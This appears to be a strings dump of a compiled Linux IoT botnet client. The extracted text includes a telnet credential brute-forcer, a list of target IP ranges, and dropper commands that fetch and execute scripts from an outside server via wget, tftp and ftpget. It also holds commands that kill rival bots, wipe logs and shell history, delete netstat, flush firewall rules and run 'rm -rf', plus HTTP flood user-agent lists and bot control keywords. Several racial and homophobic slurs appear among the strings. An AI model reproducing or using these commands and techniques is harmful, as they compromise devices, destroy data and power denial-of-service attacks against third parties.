PTRh
</v	
<suB
<du0
<xu0
<Xu0
<uu-
<cuJ
<rt	
<ru9
;E }
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
Eleele
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RQSPVW
[^_]
[^_]
SVPhL
SVPh
RQSVPhh
QRPh
[^_]
1v^j
[^_]
SVWQRP
SVWQRP
[^_]
WVSQ
SPhT
SPhl
< t	
< t	
PRQW
T$(S
T$(S
t$(j
UWVS
t$$P
[^_]
UWVS
[^_]
QPRS
^8PShkJ
t$,V
UWVS
t$$S
[^_]
UWVS
T$`~
D$(%
WVPR
$VRP
?0u+
VVhb
D$ P
PQRR
QQRW
[^_]
tP~N
t@~>=
UWVS
<$u0
\$L9
~	<mtN
:*u4
T$X:
L$pE
D$`P
L$p)
\[^_]
AIt	
UWVS
ZY[^_]
UWVS
D$gP
[^_]
UWVS
Z[^_]
\$HPh
D$)P
RVSh
WVS1
D$ P
D$$Ph
alula
UWVS
t$xSU
t$xj
t$hW
\$DS
D$TPh(;
E$VRWP
uZRj
t$,U
L[^_]
D$ Pj
D$ Pj
xAPPSh 7
UWVS
\$Th0
D$8P
T$ !
#t$ 
2#D$ 
D$8P
[^_]
UWVS
[^_]
UWVS
u=9J
;X,tQ
[^_]
UWVS
u<9J
SSPQ)
[^_]
uXRh
\$ S
D$,Phx
XZhx
XZhx
UWVS
[^_]
UWVS
[^_]
UWVS
;<$|
XZKy
[^_]
UWVS
[^_]
D$ [Xj
}/QQ
uJQQj
t$@h
D$4j
UWVS
 <xu
(<`v
}/C;T$
D$,!
[^_]
t$$h 
UWVS
u%WWSS
ZYSS
[^_]
yPPj
PPSh,
UWVS
Qjxj
D$ P
t@;D$xu
D$ P
t$Dj
D$<PR
t$(j
UWVS
\$89
[^_]
UWVS
)\$(
[^_]
UWVS
PVUR
whQWUR
[^_]
[^_]
UWVS
[^_]
UWVS
e<au
u*z(
u?z=
D$Pp
D$XP
|$6f
l$61
D$(RP
} Pj
D$'g
D$'f)
D$\p
|$d9
T$`)
D$pS
L$t1
|$'fto
[^_]
QQWS
'RRWS
UWVS
.u5A
Z[^_]
UWVS
D$7h
D$<XZj
\$PS
D$$;
}3Ph
t$(j
D$LPU
D$,9
uOQhH
K9\$$}
PPVU
;\$d|
D$tP
T$|RW
G$;G wn
9D$xu,
t$4C;\$h}
T$H^_j
uDQhH
K9\$$}
D$(@
tMQh
[^_]
UWVS
UUhP
WWhP
VVhG
SShR
t>QQhY
Beeb
\$$S
[^_]
t$4j
t$8j
UWVS
^8WShkJ
D$(P
D$(P
[^_]
UWVS
^8PShkJ
D$(PV
x6RW
D$(PV
[^_]
WVS1
UWVS
<rt>
<wt7f
<at/
E4tmPh$
t$(V
[^_]
^8QShkJ
D$ P
D$ P
UWVS
^8PShkJ
[^_]
UWVS
[^_]
WVS1
PVWS
UWVS
t+F1
D$ PU
[^_]
UWVS
D$(P
yQQVht
u+Rj
D$$P
,[^_]
UWVS
|$-1
+<0u$
D<,.f
\$7S
<[^_]
UWVS
Pj j
D$HP
D$t)
;D$|v
!WWR
[^_]
UWVS
[^_]
PPhP
UWVS
PPj#
u,PP
t$4U
[^_]
T$$S
UWVS
YRRj.W
D$()
[^_]
UWVS
G;|$,s\PS
[^_]
195.62.52.39
telnet
root
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://195.62.52.39/nwsbins.sh; chmod 777 nwsbins.sh; sh nwsbins.sh; tftp 195.62.52.39 -c get nwstftp1.sh; chmod 777 nwstftp1.sh; sh nwstftp1.sh; tftp -r nwstftp2.sh -g 195.62.52.39; chmod 777 nwstftp2.sh; sh nwstftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 195.62.52.39 nwsftp1.sh nwsftp1.sh; sh nwsftp1.sh; rm -rf nwsbins.sh nwstftp1.sh nwstftp2.sh nwsftp1.sh; rm -rf *
ogin
sername
assword
nvalid
ailed
ncorrect
enied
rror
oodbye
BusyBox
(null)
/bin/sh
/proc/cpuinfo
BOGOMIPS
PING
gethostbyname
:>%$#
112.5.%d.%d
117.165.%d.%d
85.3.%d.%d
37.158.%d.%d
95.9.%d.%d
41.252.%d.%d
58.71.%d.%d
104.55.%d.%d
78.186.%d.%d
78.189.%d.%d
221.120.%d.%d
88.5.%d.%d
41.254.%d.%d
103.20.%d.%d
103.47.%d.%d
103.57.%d.%d
45.117.%d.%d
101.51.%d.%d
137.59.%d.%d
1.56.%d.%d
1.188.%d.%d
14.204.%d.%d
27.0.%d.%d
27.8.%d.%d
27.50.%d.%d
27.54.%d.%d
27.98.%d.%d
27.112.%d.%d
27.192.%d.%d
36.32.%d.%d
36.248.%d.%d
39.64.%d.%d
42.4.%d.%d
42.48.%d.%d
42.52.%d.%d
42.56.%d.%d
42.63.%d.%d
42.84.%d.%d
42.176.%d.%d
42.224.%d.%d
43.253.%d.%d
43.230.%d.%d
163.53.%d.%d
62.252.%d.%d
43.245.%d.%d
62.255.%d.%d
123.25.%d.%d
103.54.%d.%d
27.255.%d.%d
103.204.%d.%d
123.24.%d.%d
113.191.%d.%d
81.100.%d.%d
113.188.%d.%d
113.189.%d.%d
94.174.%d.%d
14.160.%d.%d
14.161.%d.%d
14.162.%d.%d
14.163.%d.%d
14.164.%d.%d
14.165.%d.%d
14.166.%d.%d
14.167.%d.%d
14.168.%d.%d
14.169.%d.%d
14.170.%d.%d
14.171.%d.%d
14.172.%d.%d
14.173.%d.%d
14.174.%d.%d
14.175.%d.%d
14.176.%d.%d
14.177.%d.%d
14.178.%d.%d
14.179.%d.%d
14.180.%d.%d
14.181.%d.%d
14.182.%d.%d
14.183.%d.%d
14.184.%d.%d
14.185.%d.%d
14.186.%d.%d
14.187.%d.%d
14.188.%d.%d
14.189.%d.%d
14.190.%d.%d
14.191.%d.%d
45.121.%d.%d
45.120.%d.%d
45.115.%d.%d
43.252.%d.%d
43.240.%d.%d
41.174.%d.%d
49.118.%d.%d
78.188.%d.%d
45.127.%d.%d
103.30.%d.%d
14.33.%d.%d
123.16.%d.%d
202.44.%d.%d
116.93.%d.%d
91.83.%d.%d
41.253.%d.%d
117.173.%d.%d
113.190.%d.%d
146.88.%d.%d
112.196.%d.%d
113.178.%d.%d
112.45.%d.%d
183.223.%d.%d
116.71.%d.%d
103.44.%d.%d
110.235.%d.%d
124.253.%d.%d
211.237.%d.%d
117.175.%d.%d
178.93.%d.%d
111.9.%d.%d
222.252.%d.%d
113.174.%d.%d
113.160.%d.%d
113.161.%d.%d
113.162.%d.%d
113.163.%d.%d
113.164.%d.%d
113.165.%d.%d
113.166.%d.%d
113.167.%d.%d
113.168.%d.%d
113.169.%d.%d
123.17.%d.%d
123.18.%d.%d
123.19.%d.%d
123.20.%d.%d
123.21.%d.%d
123.22.%d.%d
222.253.%d.%d
222.254.%d.%d
222.255.%d.%d
37.247.%d.%d
41.208.%d.%d
183.220.%d.%d
175.201.%d.%d
103.198.%d.%d
50.205.%d.%d
88.248.%d.%d
88.105.%d.%d
88.247.%d.%d
85.105.%d.%d
188.3.%d.%d
103.203.%d.%d
103.55.%d.%d
103.220.%d.%d
183.233.%d.%d
103.242.%d.%d
103.14.%d.%d
103.195.%d.%d
103.214.%d.%d
103.218.%d.%d
103.225.%d.%d
103.228.%d.%d
103.231.%d.%d
103.60.%d.%d
103.248.%d.%d
103.253.%d.%d
103.255.%d.%d
103.35.%d.%d
103.49.%d.%d
103.62.%d.%d
144.48.%d.%d
163.47.%d.%d
223.29.%d.%d
59.153.%d.%d
113.176.%d.%d
113.175.%d.%d
113.177.%d.%d
113.183.%d.%d
202.164.%d.%d
203.134.%d.%d
210.56.%d.%d
49.156.%d.%d
203.210.%d.%d
117.181.%d.%d
117.178.%d.%d
117.177.%d.%d
117.176.%d.%d
117.170.%d.%d
117.171.%d.%d
117.162.%d.%d
112.26.%d.%d
112.27.%d.%d
112.28.%d.%d
112.29.%d.%d
112.30.%d.%d
112.31.%d.%d
203.150.%d.%d
50.233.%d.%d
%d.%d.%d.%d
[0;31mSuccessfully Bruteforced IP: 
[0;33m%s | 
[0;31mUsername: 
[0;33m%s | 
[0;31mPassword: 
[0;33m%s
REPORT %s:%s:%s
%s cd /var/; rm -rf tftp; wget http://195.62.52.39/nwtftp || tftp -r tftp -g 195.62.52.39; chmod 777 tftp; ./nwtftp; rm -rf nwtftp
jackmy*
busybox*
bin*
sex*
tftp*
arm*
mipsel*
mips*
mips64*
i686*
sparc*
sh4*
bot*
jackmeoff*
hackz*
bruv*
wget
armv*
ntpd*
shitty*
jack*
ssh*
mips
mipsel
i686
i586
/dev/netslink/
/tmp/
/var/
/dev/
/var/run/
/dev/shm/
/mnt/
/boot/
/usr/
>%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve ;echo ps aux >> proc ; pkill -9 %d
>%s.t && cd %s ; >retrieve
pkill -9 %s
rm -rf /tmp/* /var/* /var/run/* /var/tmp/*
rm -rf /var/log/wtmp
history -c;history -w
rm -rf /tmp/*
history -c
rm -rf ~/.bash_history
rm -rf /bin/netstat
history -w
Borrow or rob
pkill -9 busybox
pkill -9 perl
service iptables stop
/sbin/iptables -F;/sbin/iptables -X
Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0
Opera/6.04 (Windows XP; U) [en]
Opera/9.99 (X11; U; sk)
Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)
Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
Mozilla/5.0 (PLAYSTATION 3; 3.55)
Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
wii libnup/1.0
Mozilla/4.0 (PSP (PlayStation Portable); 2.00)
PSP (PlayStation Portable); 2.00
Bunjalloo/0.7.6(Nintendo DS;U;en)
Doris/1.15 [en] (Symbian)
BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)
Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable
Mozilla/5.0 (Windows; U; WinNT; en; Preview) Gecko/20020603 Beonex/0.8-stable
Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b2) Gecko/20060831 BonEcho/2.0b2
Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1b1) Gecko/20060601 BonEcho/2.0b1 (Ubuntu-edgy)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
close
keep-alive
accept
%s %s HTTP/1.1
Connection: %s
Accept: */*
User-Agent: %s
arfgG
HBiug655
KJYDFyljf754
LIKUGilkut769458905
JHFDSkgfc5747694
GJjyur67458
RYSDk747586
HKJGi5r8675
KHGK7985i
yuituiILYF
GKJDghfcjkgd4
uygtfgtrevf
tyeuhygbtfvg
ewqdcftr
trbazetghhnbrty
tbhrwsehbg
twehgbferhb
etrbhhgetrb
edfverthbyrtb
kmiujmnhnhfgn
zcdbvgdfsbgfd
gdfbtsdgb
ghdugffytsdyt
tgerthgwtrwry
yteytietyue
qsortEQS
8969876hjkghblk
hackz
shdyed
http
sghwiondc
nigger
pussy
faggot
Failed opening raw socket.
Failed setting raw headers mode.
Invalid flag "%s"
PONG!
GETLOCALIP
My IP: %s
BOTKILL
Killing Bots
LOOPME
LOOPING PAYLOAD
SCANNER
SCANNER ON | OFF
 OFF
NETIS
[NETIS] SCANNER Starting
HOLD
JUNK
HTTP
COMBO
STOP
HOODASSSHIT
8.8.8.8
/proc/net/route
	00000000	
/usr/bin/python
SERVER
ROUTER
sshd
/usr/sbin/dropbear
BUILD %s:%s
Hella
[0;32mConnected | IP: %s | Type: %s | Version: %s
PONG
MOVE
%s 2>&1
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
God A red nugget A fat egg under a dog
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
%s%s%s
Error 0
Unknown host
A Santa lives evil at NASA
Host name lookup failure
Unknown server error
No address associated with name
Resolver error
/bin/sh
/dev/null
L(knN
 Ainf
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
CAk[S
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
Do nine men interpret Nine men I nod
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.comment
libc/sysdeps/linux/i386/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2429
p.2427
__do_global_dtors_aux
object.2482
frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/i386/crtn.S
libc/sysdeps/linux/i386/crt1.S
client.c
i.4258
printchar
prints
printi
print
fdopen_pids
hextable
ipState
C.485.7576
C.484.7575
C.483.7574
C.497.7654
C.501.7701
libc/sysdeps/linux/i386/vfork.S
__syscall_fcntl.c
__syscall_fcntl64.c
_exit.c
access.c
chdir.c
close.c
dup2.c
fork.c
getdtablesize.c
geteuid.c
getpid.c
getrlimit.c
ioctl.c
kill.c
open.c
pipe.c
prctl.c
read.c
select.c
setsid.c
sigprocmask.c
time.c
waitpid.c
write.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
__errno_location.c
printf.c
snprintf.c
sprintf.c
vsnprintf.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.3991
_fixed_buffers
_wcommit.c
vfprintf.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4201
prefix.4202
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.4203
qual_chars.4208
spec_chars.4204
spec_ranges.4205
spec_or_mask.4206
spec_and_mask.4207
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strchr.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1161
_string_syserrmsgs.c
bcopy.c
strcasestr.c
strtok.c
next_start.1109
isatty.c
tcgetattr.c
ntohl.c
herror.c
error_msg
h_errlist
colon_space.2762
inet_ntoa.c
buf.2658
inet_makeaddr.c
gethostbyname.c
buf.4993
h.4992
gethostbyname_r.c
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
socket.c
sigaddset.c
sigempty.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
rand.c
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
system.c
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
sysconf.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.2832
sigaction.c
__restore_rt
__restore
__syscall_error.c
libc/sysdeps/linux/i386/mmap.S
__socketcall.c
__syscall_rt_sigaction.c
clock_getres.c
execve.c
getegid.c
getgid.c
getpagesize.c
getuid.c
munmap.c
nanosleep.c
sbrk.c
wait4.c
__C_ctype_tolower.c
errno.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
fprintf.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
memchr.c
memmove.c
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
raise.c
dl-support.c
brk.c
poll.c
fclose.c
fopen.c
fseeko.c
fseeko64.c
_adjust_pos.c
_fopen.c
